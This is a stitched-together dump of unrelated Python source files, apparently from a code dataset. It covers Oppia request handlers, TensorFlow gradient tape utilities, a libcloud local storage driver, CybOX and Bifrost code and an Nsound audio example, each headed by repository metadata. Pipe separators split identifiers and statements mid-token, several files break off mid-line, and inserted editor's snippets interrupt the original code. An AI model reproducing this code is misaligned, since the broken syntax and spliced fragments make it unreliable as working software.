assert short_name in summary.get('sure_licenses', [])
|
anthkris/oppia | core/controllers/base.py | Python | apache-2.0 | 20,845 | 0.000096 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base constants and handlers."""
import base64
import Cookie
import datetime
import hmac
import json
import logging
import os
import sys
import time
import traceback
import urlparse
import jinja2
import webapp2
from google.appengine.api import users
from core.domain import config_domain
from core.domain import config_services
from core.domain import rights_manager
from core.domain import rte_component_registry
from core.domain import user_services
from core.platform import models
import feconf
import jinja_utils
import utils
current_user_services = models.Registry.import_current_user_services()
(user_models,) = models.Registry.import_models([models.NAMES.user])
ONE_DAY_AGO_IN_SECS = -24 * 60 * 60
DEFAULT_CSRF_SECRET = 'oppia csrf secret'
CSRF_SECRET = config_domain.ConfigProperty(
'oppia_csrf_secret', {'type': 'unicode'},
'Text used to encrypt CSRF tokens.', DEFAULT_CSRF_SECRET)
BEFORE_END_HEAD_TAG_HOOK = config_domain.ConfigProperty(
'before_end_head_tag_hook', {
'type': 'unicode',
'ui_config': {
'rows': 7,
},
},
'Code to insert just before the closing </head> tag in all pages.', '')
def require_user(handler):
"""Decorator that checks if a user is associated to the current session."""
def test_login(self, **kwargs):
"""Checks if the user for the current session is logged in."""
if not self.user_id:
self.redirect(current_user_services.create_login_url(
self.request.uri))
return
return handler(self, **kwargs)
return test_login
def require_moderator(handler):
"""Decorator that checks if the current user is a moderator."""
def test_is_moderator(self, **kwargs):
"""Check that the user is a moderator."""
if not self.user_id:
self.redirect(current_user_services.create_login_url(
self.request.uri))
return
if not rights_manager.Actor(self.user_id).is_moderator():
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.')
return handler(self, **kwargs)
return test_is_moderator
def require_fully_signed_up(handler):
"""Decorator that checks if the user is logged in and has completed the
signup process. If any of these checks fail, an UnauthorizedUserException
is | raised.
"""
def test_registered_as_editor(self, **kwargs):
"""Check that the user has registered as an editor."""
if (not self.user_id
or self.username in config_domain.BANNED_USERNAMES.value
or not user_services.has_fully_registered(self.user_id)):
raise self.UnauthorizedUserException(
'You do not have the credentials to access this page.' | )
return handler(self, **kwargs)
return test_registered_as_editor
def _clear_login_cookies(response_headers):
# AppEngine sets the ACSID cookie for http:// and the SACSID cookie
# for https:// . We just unset both below.
cookie = Cookie.SimpleCookie()
for cookie_name in ['ACSID', 'SACSID']:
cookie = Cookie.SimpleCookie()
cookie[cookie_name] = ''
cookie[cookie_name]['expires'] = (
datetime.datetime.utcnow() +
datetime.timedelta(seconds=ONE_DAY_AGO_IN_SECS)
).strftime('%a, %d %b %Y %H:%M:%S GMT')
response_headers.add_header(*cookie.output().split(': ', 1))
class LogoutPage(webapp2.RequestHandler):
def get(self):
"""Logs the user out, and returns them to a specified page or the home
page.
"""
# The str conversion is needed, otherwise an InvalidResponseError
# asking for the 'Location' header value to be str instead of
# 'unicode' will result.
url_to_redirect_to = str(self.request.get('return_url') or '/')
_clear_login_cookies(self.response.headers)
if feconf.DEV_MODE:
self.redirect(users.create_logout_url(url_to_redirect_to))
else:
self.redirect(url_to_redirect_to)
class BaseHandler(webapp2.RequestHandler):
"""Base class for all Oppia handlers."""
# Whether to check POST and PUT payloads for CSRF tokens prior to
# processing them. Can be overridden by subclasses if this check is
# not necessary.
REQUIRE_PAYLOAD_CSRF_CHECK = True
# Whether to redirect requests corresponding to a logged-in user who has
# not completed signup in to the signup page. This ensures that logged-in
# users have agreed to the latest terms.
REDIRECT_UNFINISHED_SIGNUPS = True
# What format the get method returns when exception raised, json or html
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_HTML
@webapp2.cached_property
def jinja2_env(self):
return jinja_utils.get_jinja_env(feconf.FRONTEND_TEMPLATES_DIR)
def __init__(self, request, response): # pylint: disable=super-init-not-called
# Set self.request, self.response and self.app.
self.initialize(request, response)
self.start_time = datetime.datetime.utcnow()
# Initializes the return dict for the handlers.
self.values = {}
self.user = current_user_services.get_current_user()
self.user_id = current_user_services.get_user_id(
self.user) if self.user else None
self.username = None
self.has_seen_editor_tutorial = False
self.partially_logged_in = False
self.values['profile_picture_data_url'] = None
self.preferred_site_language_code = None
if self.user_id:
email = current_user_services.get_user_email(self.user)
user_settings = user_services.get_or_create_user(
self.user_id, email)
self.values['user_email'] = user_settings.email
if (self.REDIRECT_UNFINISHED_SIGNUPS and not
user_services.has_fully_registered(self.user_id)):
_clear_login_cookies(self.response.headers)
self.partially_logged_in = True
self.user_id = None
else:
self.username = user_settings.username
self.preferred_site_language_code = (
user_settings.preferred_site_language_code)
self.values['username'] = self.username
self.values['profile_picture_data_url'] = (
user_settings.profile_picture_data_url)
if user_settings.last_started_state_editor_tutorial:
self.has_seen_editor_tutorial = True
# In order to avoid too many datastore writes, we do not bother
# recording a log-in if the current time is sufficiently close
# to the last log-in time.
if (user_settings.last_logged_in is None or
not utils.are_datetimes_close(
datetime.datetime.utcnow(),
user_settings.last_logged_in)):
user_services.record_user_logged_in(self.user_id)
rights_mgr_user = rights_manager.Actor(self.user_id)
self.is_moderator = rights_mgr_user.is_moderator()
self.is_admin = rights_mgr_user.is_admin()
self.is_super_admin = (
current_user_services.is_current_user_super_admin())
self.values['is_moderator'] = self.is_moderator
self.values['is_admin'] = self.is_admin
self.values['is_super_admin'] = self.is_super_admin
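# [Editor's note] A hypothetical handler showing how the decorators above are
# meant to be applied; the handler name and payload are illustrative and not
# part of Oppia:
class ProfileDataHandler(BaseHandler):

    @require_user
    def get(self):
        # self.user_id is guaranteed to be set here: anonymous requests were
        # already redirected to the login URL by require_user.
        self.response.write(json.dumps({'username': self.username}))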
|
vdmann/cse-360-image-hosting-website | django-varnish-master/varnishapp/urls.py | Python | mit | 180 | 0.005556 | from django. | conf.urls.defaults import *
from django.conf import settings
from manager import VarnishManager
urlpatterns = patterns('varnishapp.views',
(r'', 'management'),
| )
|
fontanon/deldichoalhecho | test.py | Python | gpl-3.0 | 221 | 0 | #!/usr/bin/env python
from django.core.management import call_command
impor | t os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project_site.settings")
call_command('test', 'promises_instances', 'ddah | _web', verbosity=1)
|
gunan/tensorflow | tensorflow/python/eager/tape.py | Python | apache-2.0 | 7,733 | 0.007242 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradient tape utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python import pywrap_tfe
from tensorflow.python.util.lazy_loader import LazyLoader
# There is a circular dependency between this, ops.py, and
# distribution_strategy_context.
# TODO(b/117329403): Remove this circular dependency.
distribution_strategy_context = LazyLoader(
"distribution_strategy_context", globals(),
"tensorflow.python.distribute."
"distribution_strategy_context")
class Tape(object):
"""Represents a gradient propagation trace."""
def __init__(self, tape):
self._tape = tape
def watched_variables(self):
return pywrap_tfe.TFE_Py_TapeWatchedVariables(self._tape)
def push_new_tape(persistent=False, watch_accessed_variables=True):
"""Pushes a new tape onto the tape stack."""
tape = pywrap_tfe.TFE_Py_TapeSetNew(persistent, watch_accessed_variables)
return Tape(tape)
def push_tape(tape):
"""Pushes an existing tape onto the tape stack."""
pywrap_tfe.TFE_Py_TapeSetAdd(tape._tape) # pylint: disable=protected-access
def watch(tape, tensor):
"""Marks this tensor to be watched by the given tape."""
pywrap_tfe.TFE_Py_TapeWatch(tape._tape, tensor) # pylint: disable=protected-access
class VariableWatcher(object):
"""A scope that tracks all trainable variable accesses within it.
This explicitly ignores variables that are not marked as trainable.
Sample usage:
var = tf.Variable(0.0)
with VariableWatcher() as variable_watcher:
var.assign_add(1.0)
assert variable_watcher.watched_variables == [var]
"""
def __init__(self):
self._variable_watcher = None
def __enter__(self):
self._variable_watcher = pywrap_tfe.TFE_Py_VariableWatcherNew()
return self
def __exit__(self, typ, value, traceback):
pywrap_tfe.TFE_Py_VariableWatcherRemove(self._variable_watcher)
def watched_variables(self):
"""Returns a tuple of variables accessed under this scope."""
return pywrap_tfe.TFE_Py_VariableWatcherWatchedVariables(
self._variable_watcher)
def watch_variable(tape, variable):
"""Marks this variable to be watched by the given tape."""
strategy, context = (
distribution_strategy_context.get_strategy_and_replica_context())
if context:
variables = [strategy.extended.value_container(variable)]
else:
variables = strategy.experimental_local_results(variable)
for var in variables:
pywrap_tfe.TFE_Py_TapeWatchVariable(tape._tape, var) # pylint: disable=protected-access
pywrap_tfe.TFE_Py_VariableWatcherVariableAccessed(var)
def variable_accessed(variable):
"""Notifies all tapes in the stack that a variable has been accessed.
Args:
variable: variable to be watched.
"""
strategy, context = (
distribution_strategy_context.get_strategy_and_replica_context())
if context:
variables = [strategy.extended.value_container(variable)]
else:
variables = strategy.experimental_local_results(variable)
for var in variables:
pywrap_tfe.TFE_Py_TapeVariableAccessed(var)
pywrap_tfe.TFE_Py_VariableWatcherVariableAccessed(var)
def variables_accessed(variables):
"""Notifies all tapes in the stack that variables have been accessed.
Only trainable variables are marked as accessed.
Args:
variables: iterable of variables to mark as accessed.
"""
strategy, context = (
distribution_strategy_context.get_strategy_and_replica_context())
accessed = []
if context:
accessed = [strategy.extended.value_container(variable)
for variable in variables if variable.trainable]
else:
for variable in variables:
if variable.trainable:
accessed.extend(strategy.experimental_local_results(variable))
for var in accessed:
pywrap_tfe.TFE_Py_TapeVariableAccessed(var)
pywrap_tfe.TFE_Py_VariableWatcherVariableAccessed(var)
def pop_tape(tape):
"""Pops the given tape in the stack."""
pywrap_tfe.TFE_Py_TapeSetRemove(tape._tape) # pylint: disable=protected-access
@contextlib.contextmanager
def stop_recording():
"""Stop all gradient recording (backprop and forwardprop)."""
is_stopped = pywrap_tfe.TFE_Py_TapeSetIsStopped()
try:
if not is_stopped:
pywrap_tfe.TFE_Py_TapeSetStopOnThread()
yield
finally:
if not is_stopped:
pywrap_tfe.TFE_Py_TapeSetRestartOnThread()
def should_record_backprop(tensors):
"""Returns true if any tape in the stack watches any of these tensors.
Only takes GradientTapes into account, not forward accumulators.
Args:
tensors: Tensors to check, typically inputs to an operation.
Returns:
Boolean, whether any tape watches any of `tensors`.
"""
return pywrap_tfe.TFE_Py_TapeSetShouldRecordBackprop(tensors)
def record_operation(op_type, output_tensors, input_tensors, backward_function,
forward_function=None):
"""Records the operation on all tapes in the stack."""
pywrap_tfe.TFE_Py_TapeSetRecordOperation(op_type, output_tensors,
input_tensors, backward_function,
forward_function)
def record_operation_backprop_only(op_type, output_tensors, input_tensors,
backward_function):
"""Records the operation on all backward tapes in the stack."""
pywrap_tfe.TFE_Py_TapeSetRecordOperationBackprop(op_type, output_tensors,
i | nput_tensors,
backward_function)
def record_operation_forwardprop_only(op_type, output_tensors | , input_tensors,
backward_function,
forwardprop_output_indices):
"""Records the operation on all forward accumulators in the stack.
Args:
op_type: a string for the operation type, used in the backprop code
output_tensors: a list of Python Tensor objects output by the operation
input_tensors: a list of input Tensors to the recorded operation
backward_function: the function to be called to, given the gradients of the
output tensors, produce the gradients of the input tensors. This function
is automatically transposed to produce output gradients given input
gradients.
forwardprop_output_indices: indicates any output_tensors which contain JVPs.
Typically these will have come from TFE_Py_PackForwardGradients. May be
None or an empty sequence if there are no JVP outputs from the operation.
"""
pywrap_tfe.TFE_Py_TapeSetRecordOperationForwardprop(
op_type, output_tensors, input_tensors, backward_function,
forwardprop_output_indices)
def delete_trace(tensor_id):
"""Deletes traces for this Tensor from all tapes in the stack."""
pywrap_tfe.TFE_Py_TapeSetDeleteTrace(tensor_id)
def could_possibly_record():
"""Returns True if any tape is active."""
return not pywrap_tfe.TFE_Py_TapeSetIsEmpty()
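# [Editor's note] The push/pop and record helpers above are the low-level
# machinery behind the public tf.GradientTape API; a minimal sketch of the
# behaviour they implement, assuming TensorFlow 2.x with eager execution:
import tensorflow as tf

x = tf.Variable(3.0)
with tf.GradientTape() as tape:  # push_new_tape(); trainable variables are auto-watched
    y = x * x                    # the multiply op is recorded via record_operation()
grad = tape.gradient(y, x)       # pops the tape and replays the trace backwards
print(grad.numpy())              # 6.0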
|
Jc2k/libcloud | libcloud/storage/drivers/local.py | Python | apache-2.0 | 18,796 | 0.00016 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Provides storage driver for working with local filesystem
"""
from __future__ import with_statement
import errno
import os
import shutil
import sys
try:
    import lockfile
    from lockfile import mkdirlockfile
except ImportError:
raise ImportError('Missing lockfile dependency, you can install it ' \
'using pip: pip install lockfile')
from libcloud.utils.files import read_in_chunks
from libcloud.utils.py3 import relpath
from libcloud.utils.py3 import u
from libcloud.common.base import Connection
from libcloud.storage.base import Object, Container, StorageDriver
from libcloud.common.types import LibcloudError
from libcloud.storage.types import ContainerAlreadyExistsError
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import ObjectError
from libcloud.storage.types import ObjectDoesNotExistError
from libcloud.storage.types import InvalidContainerNameError
IGNORE_FOLDERS = ['.lock', '.hash']
class LockLocalStorage(object):
"""
A class to help in locking a local path before being updated
"""
def __init__(self, path):
self.path = path
self.lock = mkdirlockfile.MkdirLockFile(self.path, threaded=True)
def __enter__(self):
try:
self.lock.acquire(timeout=0.1)
except lockfile.LockTimeout:
raise LibcloudError('Lock timeout')
def __exit__(self, type, value, traceback):
if self.lock.is_locked():
self.lock.release()
if value is not None:
raise value
class LocalStorageDriver(StorageDriver):
"""
Implementation of local file-system based storage. This is helpful
where the user would want to use the same code (using libcloud) and
switch between cloud storage and local storage
"""
connectionCls = Connection
name = 'Local Storage'
website = 'http://example.com'
hash_type = 'md5'
def __init__(self, key, secret=None, secure=True, host=None, port=None,
**kwargs):
# Use the key as the path to the storage
self.base_path = key
if not os.path.isdir(self.base_path):
raise LibcloudError('The base path is not a directory')
super(StorageDriver, self).__init__(key=key, secret=secret,
secure=secure, host=host,
port=port, **kwargs)
def _make_path(self, path, ignore_existing=True):
"""
Create a path by checking if it already exists
"""
try:
os.makedirs(path)
except OSError:
exp = sys.exc_info()[1]
if exp.errno == errno.EEXIST and not ignore_existing:
raise exp
def _check_container_name(self, container_name):
"""
Check if the container name is valid
@param container_name: Container name
@type container_name: C{str}
"""
if '/' in container_name or '\\' in container_name:
raise InvalidContainerNameError(value=None, driver=self,
container_name=container_name)
def _make_container(self, container_name):
"""
Create a container instance
@param container_name: Container name.
@type container_name: C{str}
@return: Container instance.
@rtype: L{Container}
"""
self._check_container_name(container_name)
full_path = os.path.join(self.base_path, container_name)
try:
stat = os.stat(full_path)
if not os.path.isdir(full_path):
raise OSError('Target path is not a directory')
except OSError:
raise ContainerDoesNotExistError(value=None, driver=self,
container_name=container_name)
extra = {}
extra['creation_time'] = stat.st_ctime
extra['access_time'] = stat.st_atime
extra['modify_time'] = stat.st_mtime
return Container(name=container_name, extra=extra, driver=self)
def _make_object(self, container, object_name):
"""
Create an object instance
@param container: Container.
@type container: L{Container}
@param object_name: Object name.
@type object_name: C{str}
@return: Object instance.
@rtype: L{Object}
"""
full_path = os.path.join(self.base_path, container.name, object_name)
if os.path.isdir(full_path):
raise ObjectError(value=None, driver=self, object_name=object_name)
try:
stat = os.stat(full_path)
except Exception:
raise ObjectDoesNotExistError(value=None, driver=self,
object_name=object_name)
# Make a hash for the file based on the metadata. We can safely
# use only the mtime attribute here. If the file contents change,
# the underlying file-system will change mtime
data_hash = self._get_hash_function()
data_hash.update(u(stat.st_mtime).encode('ascii'))
data_hash = data_hash.hexdigest()
extra = {}
extra['creation_time'] = stat.st_ctime
extra['access_time'] = stat.st_atime
extra['modify_time'] = stat.st_mtime
return Object(name=object_name, size=stat.st_size, extra=extra,
driver=self, container=container, hash=data_hash,
meta_data=None)
def iterate_containers(self):
"""
Return a generator of containers.
@return: A generator of Contai | ner instances.
@rtype: C{generator} of L{Contain | er}
"""
for container_name in os.listdir(self.base_path):
full_path = os.path.join(self.base_path, container_name)
if not os.path.isdir(full_path):
continue
yield self._make_container(container_name)
def _get_objects(self, container):
"""
Recursively iterate through the file-system and return the object names
"""
cpath = self.get_container_cdn_url(container, check=True)
for folder, subfolders, files in os.walk(cpath, topdown=True):
# Remove unwanted subfolders
for subf in IGNORE_FOLDERS:
if subf in subfolders:
subfolders.remove(subf)
for name in files:
full_path = os.path.join(folder, name)
object_name = relpath(full_path, start=cpath)
yield self._make_object(container, object_name)
def iterate_container_objects(self, container):
"""
Returns a generator of objects for the given container.
@param container: Container instance
@type container: L{Container}
@return: A generator of Object instances.
@rtype: C{generator} of L{Object}
"""
return self._get_objects(container)
def get_container(self, container_name):
"""
Return a container instance.
@param container_name: Container name.
@type container_name: C{str}
@return: L{Container} instance.
@rtype: L{Container}
"""
return self._make_container(container_name)
def get_container_cdn_url(s |
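# [Editor's note] A minimal usage sketch for the driver above: the `key`
# argument is the base directory and every sub-directory is treated as a
# container. Paths are illustrative only:
import os
import tempfile
from libcloud.storage.drivers.local import LocalStorageDriver

base_path = tempfile.mkdtemp()
os.makedirs(os.path.join(base_path, 'my-container'))

driver = LocalStorageDriver(key=base_path)
container = driver.get_container('my-container')
for obj in driver.iterate_container_objects(container):
    print(obj.name, obj.size)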
ramusus/django-vkontakte-groups-statistic | setup.py | Python | bsd-3-clause | 1,127 | 0.000887 | from setuptools import setup, find_packages
setup(
name='django-vkontakte-groups-statistic',
version=__import__('vkontakte_groups_statistic').__version__,
description='Django implementation for vkontakte API Groups Statistic',
long_description=open('README.md').read(),
author='ramusus',
author_email='ramusus@gmail.com',
url='https://github.com/ramusus/django-vkontakte-groups-statistic',
download_url='http://pypi.python.org/pypi/django-vkontakte-groups-statistic',
license='BSD',
packages=find_packages(),
include_package_data=True,
zip_safe=False, # because we're including media that | Django needs
install_requires=[
'django-vkontakte-api>=0.4.2',
'django-vkontakte-groups>=0.3.5',
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers', |
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
CybOXProject/python-cybox | cybox/objects/win_volume_object.py | Python | bsd-3-clause | 1,947 | 0.001027 | # Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities, fields
import cybox.bindings.win_volume_object as win_volume_binding
from cybox.objects.volume_object import Volume
from cybox.common import BaseProperty, String
class WindowsDrive(BaseProperty):
| _binding = win_volume_binding
_binding_class = win_volume_binding.WindowsDriveType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject | -2"
TYPE_DRIVE_UNKNOWN = "DRIVE_UNKNOWN"
TYPE_DRIVE_NO_ROOT_DIR = "DRIVE_NO_ROOT_DIR"
TYPE_DRIVE_REMOVABLE = "DRIVE_REMOVABLE"
TYPE_DRIVE_FIXED = "DRIVE_FIXED"
TYPE_DRIVE_REMOTE = "DRIVE_REMOTE"
TYPE_DRIVE_CDROM = "DRIVE_CDROM"
TYPE_DRIVE_RAMDISK = "DRIVE_RAMDISK"
class WindowsVolumeAttribute(BaseProperty):
_binding = win_volume_binding
_binding_class = win_volume_binding.WindowsVolumeAttributeType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject-2"
TYPE_READ_ONLY = "ReadOnly"
TYPE_HIDDEN = "Hidden"
TYPE_NO_DEFAULT_DRIVE_LETTER = "NoDefaultDriveLetter"
TYPE_SHADOW_COPY = "ShadowCopy"
class WindowsVolumeAttributesList(entities.EntityList):
_binding = win_volume_binding
_binding_class = win_volume_binding.WindowsVolumeAttributesListType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject-2"
attribute = fields.TypedField("Attribute", WindowsVolumeAttribute, multiple=True)
class WinVolume(Volume):
_binding = win_volume_binding
_binding_class = win_volume_binding.WindowsVolumeObjectType
_namespace = "http://cybox.mitre.org/objects#WinVolumeObject-2"
_XSI_NS = "WinVolumeObj"
_XSI_TYPE = "WindowsVolumeObjectType"
attributes_list = fields.TypedField("Attributes_List", WindowsVolumeAttributesList)
drive_letter = fields.TypedField("Drive_Letter", String)
drive_type = fields.TypedField("Drive_Type", WindowsDrive)
|
ledatelescope/bifrost | test/test_serialize.py | Python | bsd-3-clause | 9,648 | 0.001658 |
# Copyright (c) 2016-2020, The Bifrost Authors. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Bifrost Authors nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# TODO: Add tests for data streams spanning multiple files
import unittest
import bifrost as bf
from bifrost.blocks import *
import os
import shutil
class TemporaryDirectory(object):
def __init__(self, path):
self.path = path
os.makedirs(self.path)
def remove(self):
shutil.rmtree(self.path)
def __enter__(self):
return self
def __exit__(self, type, value, tb):
self.remove()
def get_sigproc_file_size(filename):
"""Returns the header and data size of a sigproc file without reading
the whole file.
"""
with open(filename, 'rb') as f:
head = ''
while 'HEADER_END' not in head:
more_data = f.read(4096)
try:
more_data = more_data.decode(errors='replace')
except AttributeError:
# Python2 catch
pass
if len(more_data) == 0:
raise IOError("Not a valid sigproc file: " + filename)
head += more_data
hdr_size = head.find('HEADER_END') + len('HEADER_END')
file_size = os.path.getsize(filename)
data_size = file_size - hdr_size
return hdr_size, data_size
def rename_sequence(hdr, name):
hdr['name'] = name
return hdr
class SerializeTest(unittest.TestCase):
def setUp(self):
self.fil_file = "./data/2chan16bitNoDM.fil"
# Note: This is specific to 2chan16bitNoDM.fil
self.time_tag = 3493024746386227200
hdr_size, self.data_size = get_sigproc_file_size(self.fil_file)
with open(self.fil_file, 'rb') as f:
self.data = f.read()
self.data = self.data[hdr_size:]
self.temp_path = '/tmp/bifrost_test_serialize'
self.basename = os.path.basename(self.fil_file)
self.basepath = os.path.join(self.temp_path, self.basename)
self.gulp_nframe = 101
def run_test_serialize_with_name_no_ringlets(self, gulp_nframe_inc=0):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe, core=0)
for i in range(5):
if gulp_nframe_inc != 0:
data = copy(data,
gulp_nframe=self.gulp_nframe+i*gulp_nframe_inc)
else:
data = copy(data)
data = serialize(data, self.temp_path, core=0)
with TemporaryDirectory(self.temp_path):
pipeline.run()
# Note: SerializeBlock uses os.path.basename if path is given
hdrpath = self.basepath + '.bf.json'
datpath = self.basepath + '.bf.' + '0' * 12 + '.dat'
self.assertTrue(os.path.exists(hdrpath))
self.assertTrue(os.path.exists(datpath))
self.assertEqual(os.path.getsize(datpath), self.data_size)
with open(datpath, 'rb') as f:
data = f.read()
self.assertEqual(data, self.data)
def test_serialize_with_name_no_ringlets(self):
self.run_test_serialize_with_name_no_ringlets()
self.run_test_serialize_with_name_no_ringlets(gulp_nfram | e_inc=1)
self.run_test_serialize_with_name_no_ringlets(gulp_nframe_inc=3)
def test_serialize_with_time_tag_no_ringlets(self):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe)
# Custom view sets sequence name to '', which causes SerializeBlock
# to use the time_tag instead.
data = bf.views.custom(data, lambda hdr: rename_sequence(hdr, ''))
data = serialize(da | ta, self.temp_path)
with TemporaryDirectory(self.temp_path):
pipeline.run()
basepath = os.path.join(self.temp_path,
'%020i' % self.time_tag)
hdrpath = basepath + '.bf.json'
datpath = basepath + '.bf.' + '0' * 12 + '.dat'
self.assertTrue(os.path.exists(hdrpath))
self.assertTrue(os.path.exists(datpath))
self.assertEqual(os.path.getsize(datpath), self.data_size)
with open(datpath, 'rb') as f:
data = f.read()
self.assertEqual(data, self.data)
def test_serialize_with_name_and_ringlets(self):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe)
# Transpose so that freq becomes a ringlet dimension
# TODO: Test multiple ringlet dimensions (e.g., freq + pol) once
# SerializeBlock supports it.
data = transpose(data, ['freq', 'time', 'pol'])
data = serialize(data, self.temp_path)
with TemporaryDirectory(self.temp_path):
pipeline.run()
# Note: SerializeBlock uses os.path.basename if path is given
hdrpath = self.basepath + '.bf.json'
datpath0 = self.basepath + '.bf.' + '0' * 12 + '.0.dat'
datpath1 = self.basepath + '.bf.' + '0' * 12 + '.1.dat'
self.assertTrue(os.path.exists(hdrpath))
self.assertTrue(os.path.exists(datpath0))
self.assertTrue(os.path.exists(datpath1))
self.assertEqual(os.path.getsize(datpath0),
self.data_size // 2)
self.assertEqual(os.path.getsize(datpath1),
self.data_size // 2)
def test_deserialize_no_ringlets(self):
with TemporaryDirectory(self.temp_path):
with bf.Pipeline() as pipeline:
data = read_sigproc([self.fil_file], self.gulp_nframe)
serialize(data, self.temp_path)
pipeline.run()
datpath = self.basepath + '.bf.' + '0' * 12 + '.dat'
with bf.Pipeline() as pipeline:
data = deserialize([self.basepath + '.bf'], self.gulp_nframe)
# Note: Must rename the sequence to avoid overwriting the input
# file.
data = bf.views.custom(
data, lambda hdr: rename_sequence(hdr, hdr['name'] + '.2'))
serialize(data, self.temp_path)
pipeline.run()
datpath = self.basepath + '.2.bf.' + '0' * 12 + '.dat'
with open(datpath, 'rb') as f:
data = f.read()
self.assertEqual(len(data), len(self.data))
self.assertEqual(data, sel |
weegreenblobbie/nsound | src/examples/stretcher.py | Python | gpl-2.0 | 1,481 | 0.00135 | ###############################################################################
#
# $Id: stretcher.py 585 2010-12-15 05:21:28Z weegreenblobbie $
#
###############################################################################
from Nsound import *
# Read in the wavefile.
a1 = AudioStream("Temperature_in.wav")
# Grab sample rate.
sr = a1.getSampleRate()
# Grab the duration in seconds.
duration = a1.getDuration()
# Create a Gaussian curve for pitch/time shifting.
sin = Sine(sr)
bend = Buffer()
bend << sin.drawFatGaussian(duration, 0.15) + 1.0
# Create a Stretcher instance
stretch = Stretcher(sr, 0.08, 0.25)
# Print progress to command line.
stretch.showP | rogress(True)
print("Pitch Shifting Up")
# Create new output AudioStream.
out = AudioStream(sr, 2)
# Pitch shift the input AudioStream.
out << stretch.pitchShift(a1, bend)
out >> "Temperature_Pitch_Shifted_Up.wav"
print("Time Shifting Faster")
# Time shift input AudioStream
out = AudioStream(sr,2)
out << stretch.timeShift(a1, 1.0 / bend)
out >> "Temper | ature_Time_Shifted_Faster.wav"
bend = Buffer()
bend << 1.0 - 0.25 * sin.drawFatGaussian(duration, 0.15)
print("Pitch Shifting Down")
out = AudioStream(sr, 2)
out << stretch.pitchShift(a1, bend)
out >> "Temperature_Pitch_Shifted_Down.wav"
print("Time Shifting Slower")
bend = Buffer()
bend << 1.0 + 0.75 * sin.drawFatGaussian(duration, 0.15)
out = AudioStream(sr, 2)
out << stretch.timeShift(a1, bend)
out >> "Temperature_Time_Shifted_Slower.wav"
|